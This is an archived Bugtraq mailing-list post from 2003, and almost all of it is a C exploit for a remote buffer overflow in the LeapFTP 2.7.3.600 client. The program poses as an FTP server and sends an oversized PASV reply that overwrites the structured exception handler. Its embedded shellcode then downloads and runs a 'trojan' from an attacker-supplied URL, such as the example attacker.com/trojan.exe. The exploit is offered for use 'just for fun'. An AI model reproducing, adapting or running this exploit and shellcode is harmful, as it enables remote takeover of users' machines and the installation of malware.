[30701] in bugtraq
LeapFTP remote buffer overflow exploit
daemon@ATHENA.MIT.EDU (drG4njubas)
Fri Jul 11 15:41:19 2003
From: "drG4njubas" <drG4nj@mail.ru>
To: <bugtraq@securityfocus.com>
Date: Fri, 11 Jul 2003 22:47:01 +0400
Message-ID: <002401c347dc$d1b7d990$5b8b763e@user1>
MIME-Version: 1.0
Content-Type: multipart/mixed;
boundary="----=_NextPart_000_0025_01C347FE.58C97990"
------=_NextPart_000_0025_01C347FE.58C97990
Content-Type: text/plain;
charset="koi8-r"
Content-Transfer-Encoding: 7bit
Just for fun:)
Best Regards,
drG4njubas // DWC Security Group
Please visit: www.blacktigerz.org
------=_NextPart_000_0025_01C347FE.58C97990
Content-Type: application/octet-stream;
name="dwclftp273.cpp"
Content-Transfer-Encoding: quoted-printable
Content-Disposition: attachment;
filename="dwclftp273.cpp"
/*
,--------------------------------------------.
; _________ ___ ___ ___ _________ ;=20
; /\ ___ \\ \ /\ \ /\ \\ _____\ ;=20
; \ \ \ \ \\ \ \ \ \ \\ \____/ ;
; \ \ \ \ \\ \ \ \ \ \\ \ ;
; \ \ \___\ \\ \__\ \__\ \\ \_____ ;=20
; \ \______ / \______________\\_______\ ; =20
; \/______/ \/______________//_______/ ;
; ;
`--------------------------------------------'
,--------------------------------------------.
; LeapFTP remote buffer overflow exploit ; =20
; by drG4njubas \\ DWC Group ;
`--------------------------------------------'
,--------------------------------------------.
;This exploit works against LeapFTP 2.7.3.600;
;running on windows 2000 SP3 russian edition.;
;Technical details: with passive mode enabled ;
;LeapFTP asks for the data IP and port with  ;
;the PASV command; the stack buffer overflows;
;if the server's reply has a long IP address:;
;227 (AAAAAAAAA...(1057 bytes)... ,1,1,1,1,1);
;And this buffer overflow can overwrite a ;
;Structured Exception Handler on the stack ;
;area with an arbitrary value by specifying ;
;the address data over 1057 bytes. If this ;
;reply contains 0x29 and 0x2E bytes, an ;
;exception occurs before Structured Exception;
;Handler is overwritten and program continues;
;its normal work.  Thanks a lot to RaiSe for ;
;his wonderful shellcode. Greets fly to: ;
;areus, Over_G, subj, NeKr0, crx, nimber,;
;cydem group, zud team, DHGroup, GipsHack.;
`--------------------------------------------'
,--------------------------------------------.
; www.dwcgr0up.net ;
`--------------------------------------------'
*/
#include<winsock.h>
#include<stdio.h>
#include<stdlib.h>
#include<string.h>
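/*
 * Talk just enough FTP to a connected LeapFTP client to reach its PASV,
 * then answer PASV with the oversized "227 (<payload>,1,1,1,1,1)" reply.
 *
 * victim   connected client socket (closed by the caller).
 * payload  NUL-terminated bytes used as the "IP address" of the reply.
 *
 * Returns 0 once the overflow reply has been sent, 1 if the client
 * disconnects, sends an unexpected command, or a socket call fails.
 */
static int serve_client(SOCKET victim, const char *payload)
{
    char buffer[2048];
    const char *banner = "220 drG4njubas roxx da world...\r\n";

    /* "227 (" + payload + ",1,1,1,1,1)\r\n" has to fit in buffer; the
     * sprintf below is only safe because this check holds. */
    if (strlen(payload) + sizeof("227 (,1,1,1,1,1)\r\n") > sizeof buffer) {
        printf("ERROR: payload does not fit the reply buffer.\n");
        return 1;
    }
    if (send(victim, banner, (int)strlen(banner), 0) == SOCKET_ERROR)
        return 1;

    for (;;) {
        /* recv() does not NUL-terminate, and returns 0 on peer close and
         * SOCKET_ERROR on failure; the strncmp() calls need a terminator. */
        int n = recv(victim, buffer, (int)sizeof buffer - 1, 0);
        if (n <= 0) {
            printf("ERROR: connection lost before PASV.\n");
            return 1;
        }
        buffer[n] = '\0';

        const char *reply;
        if (strncmp(buffer, "USER", 4) == 0) {
            reply = "331 Password required for user.\r\n";
        } else if (strncmp(buffer, "PASS", 4) == 0) {
            reply = "230 User logged in.\r\n";
        } else if (strncmp(buffer, "SYST", 4) == 0) {
            reply = "215 Windows_NT version 5.0\r\n";
        } else if (strncmp(buffer, "REST", 4) == 0) {
            reply = "350 Restarting at blah.\r\n";
        } else if (strncmp(buffer, "PWD", 3) == 0) {
            reply = "257 Current directory was changed.\r\n";
        } else if (strncmp(buffer, "TYPE", 4) == 0) {
            reply = "200 Type set to blah.\r\n";
        } else if (strncmp(buffer, "PASV", 4) == 0) {
            printf("PASV command received, sending exploit...");
            sprintf(buffer, "227 (%s,1,1,1,1,1)\r\n", payload);
            if (send(victim, buffer, (int)strlen(buffer), 0) == SOCKET_ERROR) {
                printf("send failed.\n");
                return 1;
            }
            printf("finnished.\n");
            return 0;
        } else {
            printf("ERROR: Wrong client or pasv mode is not enabled.\n");
            return 1;
        }
        if (send(victim, reply, (int)strlen(reply), 0) == SOCKET_ERROR)
            return 1;
    }
}

/*
 * Entry point: pose as an FTP server on argv[1], accept a single LeapFTP
 * client and feed it the overflowing PASV reply.
 *
 * argv[1]  TCP port to listen on (1-65535).
 * argv[2]  "http:" URL of the executable the payload downloads and runs.
 *          At most 80 bytes; the payload already carries the "http:"
 *          prefix, so only the bytes after it are copied in (see below).
 *
 * Returns 0 once the reply has been sent, 1 on a usage error or a failed
 * Winsock call.
 */
int main(int argc, char *argv[])
{
    printf(",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,\n");
    printf(";LeapFTP 2.7.3.600 remote buffer overflow exploit;\n");
    printf("; Coded by drG4njubas \\\\ DWC Security Group ;\n");
    printf("; www.dwcgr0up.net ;\n");
    printf("'''''''''''''''''''''''''''''''''''''''''''''''''''\n");
    if (argc < 3) {
        printf("USAGE : dwclft273.exe <port> <trojan url>\n");
        printf("EXAMPLE : dwclft273.exe 21 http://www.attacker.com/trojan.exe\n");
        return 1;
    }

    /* Bytes sent as the "IP address" of the 227 reply (1700 of them).
     * As far as the offsets patched below are concerned:
     *   - a NOP sled, then RaiSe's downloader stub and its table of API
     *     names (GetModuleHandleA, LoadLibraryA, InternetOpenUrlA,
     *     InternetReadFile, _lcreat/_lwrite, WinExec, ExitProcess, ...)
     *     separated by 0x08; '-' stands in for '.' in "kernel32-dll",
     *     "wininet-dll" and "nssc-exe" because 0x2E may not appear on the
     *     wire (presumably the stub fixes those up);
     *   - "http:" at offset 839 followed by an 84-byte slot (844..927)
     *     for the rest of the URL, stored +3 and undone by the run of
     *     80 AB xx FF FF FF 03 bytes (sub byte ptr [ebx-N],3) near the
     *     end, so that neither 0x29 nor 0x2E reaches the client;
     *   - \x25\x49\xE1\x77 at offset 1057, i.e. 0x77E14925, the value that
     *     replaces the SEH record on the Win2000 SP3 RU build named in the
     *     header -- another build needs another address;
     *   - a relative jmp (\xE9 ...) at the very end that appears to land
     *     back in the sled. */
    char exploit[] =
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\xEB\x30\x5F\xFC\x8B\xF7\x80"
    "\x3F\x08\x75\x03\x80\x37\x08\x47\x80\x3F\x01\x75\xF2\x8B\xE6\x33\xD2\xB2\x04\xC1"
    "\xE2\x08\x2B\xE2\x8B\xEC\x33\xD2\xB2\x03\xC1\xE2\x08\x2B\xE2\x54\x5A\xB2\x7C\x8B"
    "\xE2\xEB\x02\xEB\x57\x89\x75\xFC\x33\xC0\xB4\x40\xC1\xE0\x08\x89\x45\xF8\x8B\x40"
    "\x3C\x03\x45\xF8\x8D\x40\x7E\x8B\x40\x02\x03\x45\xF8\x8B\xF8\x8B\x7F\x0C\x03\x7D"
    "\xF8\x81\x3F\x4B\x45\x52\x4E\x74\x07\x83\xC0\x14\x8B\xF8\xEB\xEB\x50\x8B\xF8\x33"
    "\xC9\x33\xC0\xB1\x10\x8B\x17\x03\x55\xF8\x52\xEB\x03\x57\x8B\xD7\x80\x7A\x03\x80"
    "\x74\x16\x8B\x32\x03\x75\xF8\x83\xC6\x02\xEB\x02\xEB\x7E\x8B\x7D\xFC\x51\xF3\xA6"
    "\x59\x5F\x74\x06\x40\x83\xC7\x04\xEB\xDB\x5F\x8B\x7F\x10\x03\x7D\xF8\xC1\xE0\x02"
    "\x03\xF8\x8B\x07\x8B\x5D\xFC\x8D\x5B\x11\x53\xFF\xD0\x89\x45\xF4\x8B\x40\x3C\x03"
    "\x45\xF4\x8B\x70\x78\x03\x75\xF4\x8D\x76\x1C\xAD\x03\x45\xF4\x89\x45\xF0\xAD\x03"
    "\x45\xF4\x89\x45\xEC\xAD\x03\x45\xF4\x89\x45\xE8\x8B\x55\xEC\x8B\x75\xFC\x8D\x76"
    "\x1E\x33\xDB\x33\xC9\xB1\x0F\x8B\x3A\x03\x7D\xF4\x56\x51\xF3\xA6\x59\x5E\x74\x06"
    "\x43\x8D\x52\x04\xEB\xED\xD1\xE3\x8B\x75\xE8\x03\xF3\x33\xC9\x66\x8B\x0E\xEB\x02"
    "\xEB\x7D\xC1\xE1\x02\x03\x4D\xF0\x8B\x09\x03\x4D\xF4\x89\x4D\xE4\x8B\x5D\xFC\x8D"
    "\x5B\x2D\x33\xC9\xB1\x07\x8D\x7D\xE0\x53\x51\x53\x8B\x55\xF4\x52\x8B\x45\xE4\xFC"
    "\xFF\xD0\x59\x5B\xFD\xAB\x8D\x64\x24\xF8\x38\x2B\x74\x03\x43\xEB\xF9\x43\xE2\xE1"
    "\x8B\x45\xE0\x53\xFC\xFF\xD0\xFD\xAB\x33\xC9\xB1\x04\x8D\x5B\x0C\xFC\x53\x51\x53"
    "\x8B\x55\xC4\x52\x8B\x45\xE4\xFF\xD0\x59\x5B\xFD\xAB\x38\x2B\x74\x03\x43\xEB\xF9"
    "\x43\xE2\xE5\xFC\x33\xD2\xB6\x1F\xC1\xE2\x08\x52\x33\xD2\x52\x8B\x45\xD4\xFF\xD0"
    "\x89\x45\xB0\x33\xD2\xEB\x02\xEB\x77\x52\x52\x52\x52\x53\x8B\x45\xC0\xFF\xD0\x8D"
    "\x5B\x03\x89\x45\xAC\x33\xD2\x52\xB6\x80\xC1\xE2\x10\x52\x33\xD2\x52\x52\x8D\x7B"
    "\x09\x57\x50\x8B\x45\xBC\xFF\xD0\x89\x45\xA8\x8D\x55\xA0\x52\x33\xD2\xB6\x1F\xC1"
    "\xE2\x08\x52\x8B\x4D\xB0\x51\x50\x8B\x45\xB8\xFF\xD0\x8B\x4D\xA8\x51\x8B\x45\xB4"
    "\xFF\xD0\x8B\x4D\xAC\x51\x8B\x45\xB4\xFF\xD0\x33\xD2\x52\x53\x8B\x45\xDC\xFF\xD0"
    "\x89\x45\xA4\x8B\x7D\xA0\x57\x8B\x55\xB0\x52\x50\x8B\x45\xD8\xFF\xD0\x8B\x55\xA4"
    "\x52\x8B\x45\xD0\xFF\xD0\xEB\x02\xEB\x12\x33\xD2\x90\x52\x53\x8B\x45\xCC\xFF\xD0"
    "\x33\xD2\x52\x8B\x45\xC8\xFF\xD0\xE8\xE6\xFD\xFF\xFF\x47\x65\x74\x4D\x6F\x64\x75"
    "\x6C\x65\x48\x61\x6E\x64\x6C\x65\x41\x08\x6B\x65\x72\x6E\x65\x6C\x33\x32\x2d\x64"
    "\x6C\x6C\x08\x47\x65\x74\x50\x72\x6F\x63\x41\x64\x64\x72\x65\x73\x73\x08\x4C\x6F"
    "\x61\x64\x4C\x69\x62\x72\x61\x72\x79\x41\x08\x5F\x6C\x63\x72\x65\x61\x74\x08\x5F"
    "\x6C\x77\x72\x69\x74\x65\x08\x47\x6C\x6F\x62\x61\x6C\x41\x6C\x6C\x6F\x63\x08\x5F"
    "\x6C\x63\x6C\x6F\x73\x65\x08\x57\x69\x6E\x45\x78\x65\x63\x08\x45\x78\x69\x74\x50"
    "\x72\x6F\x63\x65\x73\x73\x08\x77\x69\x6E\x69\x6E\x65\x74\x2d\x64\x6C\x6C\x08\x49"
    "\x6E\x74\x65\x72\x6E\x65\x74\x4F\x70\x65\x6E\x41\x08\x49\x6E\x74\x65\x72\x6E\x65"
    "\x74\x4F\x70\x65\x6E\x55\x72\x6C\x41\x08\x49\x6E\x74\x65\x72\x6E\x65\x74\x52\x65"
    "\x61\x64\x46\x69\x6C\x65\x08\x49\x6E\x74\x65\x72\x6E\x65\x74\x43\x6C\x6F\x73\x65"
    "\x48\x61\x6E\x64\x6C\x65\x08\x4E\x53\x08\x6E\x73\x73\x63\x2d\x65\x78\x65\x08\x68"
    "\x74\x74\x70\x3A\x93\x93\x93\x93\x93\x93\x93\x93\x93\x93\x93\x93\x93\x93\x93\x93"
    "\x93\x93\x93\x93\x93\x93\x93\x93\x93\x93\x93\x93\x93\x93\x93\x93\x93\x93\x93\x93"
    "\x93\x93\x93\x93\x93\x93\x93\x93\x93\x93\x93\x93\x93\x93\x93\x93\x93\x93\x93\x93"
    "\x93\x93\x93\x93\x93\x93\x93\x93\x93\x93\x93\x93\x93\x93\x93\x93\x93\x93\x93\x93"
    "\x93\x93\x93\x93\x93\x93\x93\x93\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x25\x49\xE1"
    "\x77\x90\x90\x90\x90\xFE\x83\x75\xFE\xFF\xFF\xFE\x83\xD5\xFE\xFF\xFF\xFE\x83\x25"
    "\xFF\xFF\xFF\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x80\xAB\x2F\xFF\xFF\xFF\x03\x80\xAB\x30\xFF\xFF\xFF\x03\x80\xAB\x31\xFF\xFF\xFF"
    "\x03\x80\xAB\x32\xFF\xFF\xFF\x03\x80\xAB\x33\xFF\xFF\xFF\x03\x80\xAB\x34\xFF\xFF"
    "\xFF\x03\x80\xAB\x35\xFF\xFF\xFF\x03\x80\xAB\x36\xFF\xFF\xFF\x03\x80\xAB\x37\xFF"
    "\xFF\xFF\x03\x80\xAB\x38\xFF\xFF\xFF\x03\x80\xAB\x39\xFF\xFF\xFF\x03\x80\xAB\x3A"
    "\xFF\xFF\xFF\x03\x80\xAB\x3B\xFF\xFF\xFF\x03\x80\xAB\x3C\xFF\xFF\xFF\x03\x80\xAB"
    "\x3D\xFF\xFF\xFF\x03\x80\xAB\x3E\xFF\xFF\xFF\x03\x80\xAB\x3F\xFF\xFF\xFF\x03\x80"
    "\xAB\x40\xFF\xFF\xFF\x03\x80\xAB\x41\xFF\xFF\xFF\x03\x80\xAB\x42\xFF\xFF\xFF\x03"
    "\x80\xAB\x43\xFF\xFF\xFF\x03\x80\xAB\x44\xFF\xFF\xFF\x03\x80\xAB\x45\xFF\xFF\xFF"
    "\x03\x80\xAB\x46\xFF\xFF\xFF\x03\x80\xAB\x47\xFF\xFF\xFF\x03\x80\xAB\x48\xFF\xFF"
    "\xFF\x03\x80\xAB\x49\xFF\xFF\xFF\x03\x80\xAB\x4A\xFF\xFF\xFF\x03\x80\xAB\x4B\xFF"
    "\xFF\xFF\x03\x80\xAB\x4C\xFF\xFF\xFF\x03\x80\xAB\x4D\xFF\xFF\xFF\x03\x80\xAB\x4E"
    "\xFF\xFF\xFF\x03\x80\xAB\x4F\xFF\xFF\xFF\x03\x80\xAB\x50\xFF\xFF\xFF\x03\x80\xAB"
    "\x51\xFF\xFF\xFF\x03\x80\xAB\x52\xFF\xFF\xFF\x03\x80\xAB\x53\xFF\xFF\xFF\x03\x80"
    "\xAB\x54\xFF\xFF\xFF\x03\x80\xAB\x55\xFF\xFF\xFF\x03\x80\xAB\x56\xFF\xFF\xFF\x03"
    "\x80\xAB\x57\xFF\xFF\xFF\x03\x80\xAB\x58\xFF\xFF\xFF\x03\x80\xAB\x59\xFF\xFF\xFF"
    "\x03\x80\xAB\x5A\xFF\xFF\xFF\x03\x80\xAB\x5B\xFF\xFF\xFF\x03\x80\xAB\x5C\xFF\xFF"
    "\xFF\x03\x80\xAB\x5D\xFF\xFF\xFF\x03\x80\xAB\x5E\xFF\xFF\xFF\x03\x80\xAB\x5F\xFF"
    "\xFF\xFF\x03\x80\xAB\x60\xFF\xFF\xFF\x03\x80\xAB\x61\xFF\xFF\xFF\x03\x80\xAB\x62"
    "\xFF\xFF\xFF\x03\x80\xAB\x63\xFF\xFF\xFF\x03\x80\xAB\x64\xFF\xFF\xFF\x03\x80\xAB"
    "\x65\xFF\xFF\xFF\x03\x80\xAB\x66\xFF\xFF\xFF\x03\x80\xAB\x67\xFF\xFF\xFF\x03\x80"
    "\xAB\x68\xFF\xFF\xFF\x03\x80\xAB\x69\xFF\xFF\xFF\x03\x80\xAB\x6A\xFF\xFF\xFF\x03"
    "\x80\xAB\x6B\xFF\xFF\xFF\x03\x80\xAB\x6C\xFF\xFF\xFF\x03\x80\xAB\x6D\xFF\xFF\xFF"
    "\x03\x80\xAB\x6E\xFF\xFF\xFF\x03\x80\xAB\x6F\xFF\xFF\xFF\x03\x80\xAB\x70\xFF\xFF"
    "\xFF\x03\x80\xAB\x71\xFF\xFF\xFF\x03\x80\xAB\x72\xFF\xFF\xFF\x03\x80\xAB\x73\xFF"
    "\xFF\xFF\x03\x80\xAB\x74\xFF\xFF\xFF\x03\x80\xAB\x75\xFF\xFF\xFF\x03\x80\xAB\x76"
    "\xFF\xFF\xFF\x03\x80\xAB\x77\xFF\xFF\xFF\x03\x80\xAB\x78\xFF\xFF\xFF\x03\x80\xAB"
    "\x79\xFF\xFF\xFF\x03\x80\xAB\x7A\xFF\xFF\xFF\x03\x80\xAB\x7B\xFF\xFF\xFF\x03\x80"
    "\xAB\x7C\xFF\xFF\xFF\x03\x80\xAB\x7D\xFF\xFF\xFF\x03\x80\xAB\x7E\xFF\xFF\xFF\x03"
    "\x80\xAB\x7F\xFF\xFF\xFF\x03\x80\x6B\x80\x03\x80\x6B\x81\x03\x80\x6B\x82\x03\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\xE9\x61\xF9\xFF\xFF";

    /* atoi() would turn garbage into port 0; parse strictly instead. */
    char *end;
    long port = strtol(argv[1], &end, 10);
    if (end == argv[1] || *end != '\0' || port < 1 || port > 65535) {
        printf("ERROR: port must be a number between 1 and 65535.\n");
        return 1;
    }

    const char *url = argv[2];
    size_t url_len = strlen(url);
    if (url_len > 80) {
        printf("ERROR: trojan url is too long!\n");
        return 1;
    }
    /* Only the bytes after "http:" are copied; the payload provides the
     * prefix itself, so any other scheme would be silently mangled. */
    if (url_len < 5 || strncmp(url, "http:", 5) != 0) {
        printf("ERROR: trojan url must start with http:\n");
        return 1;
    }
    for (size_t k = 5; k < url_len; k++) {
        /* '&' (0x26) and '+' (0x2B) become 0x29 / 0x2E once encoded, the two
         * bytes the header says abort the overflow before SEH is reached. */
        if (url[k] == '&' || url[k] == '+') {
            printf("ERROR: trojan url must not contain '&' or '+'.\n");
            return 1;
        }
        exploit[839 + k] = (char)(url[k] + 3);   /* undone by the sub-3 run */
    }
    /* Terminators, also stored +3: 0x0B -> 0x08 (the separator used in the
     * name table) and 0x04 -> 0x01 (apparently the end-of-table marker). */
    exploit[839 + url_len] = '\x0B';
    exploit[839 + url_len + 1] = '\x04';

    WSADATA wsaData;
    if (WSAStartup(MAKEWORD(2, 2), &wsaData) != 0) {
        printf("ERROR: WSAStartup failed.\n");
        return 1;
    }

    int rc = 1;
    SOCKET victim = INVALID_SOCKET;
    SOCKET listen_Sock = socket(AF_INET, SOCK_STREAM, 0);
    if (listen_Sock == INVALID_SOCKET) {
        printf("ERROR: socket() failed (%d).\n", WSAGetLastError());
    } else {
        SOCKADDR_IN addr_Sock;
        memset(&addr_Sock, 0, sizeof addr_Sock);
        addr_Sock.sin_family = AF_INET;
        addr_Sock.sin_addr.s_addr = htonl(INADDR_ANY);
        addr_Sock.sin_port = htons((unsigned short)port);
        printf("Awaiting for connections...\n");
        if (bind(listen_Sock, (LPSOCKADDR)&addr_Sock, sizeof(struct sockaddr)) == SOCKET_ERROR
            || listen(listen_Sock, 1) == SOCKET_ERROR) {
            printf("ERROR: bind/listen failed (%d).\n", WSAGetLastError());
        } else if ((victim = accept(listen_Sock, NULL, NULL)) == INVALID_SOCKET) {
            printf("ERROR: accept failed (%d).\n", WSAGetLastError());
        } else {
            printf("Victim connected...\n");
            rc = serve_client(victim, exploit);
            closesocket(victim);
        }
        /* Every path out of here releases the listener and Winsock. */
        closesocket(listen_Sock);
    }
    WSACleanup();
    return rc;
}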
------=_NextPart_000_0025_01C347FE.58C97990--